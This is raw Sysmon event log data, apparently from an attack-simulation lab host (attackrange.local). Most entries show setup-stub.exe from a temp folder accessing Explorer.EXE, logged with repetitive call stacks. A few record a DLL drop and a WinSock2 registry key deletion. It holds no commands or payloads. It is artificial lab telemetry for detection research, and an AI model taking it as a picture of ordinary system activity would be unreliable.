13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000016324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll2021-01-18 13:59:53.255 12241200x800000000000000016323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteKey2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AppId_Catalog\1F97E3EE 10341000x800000000000000016322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
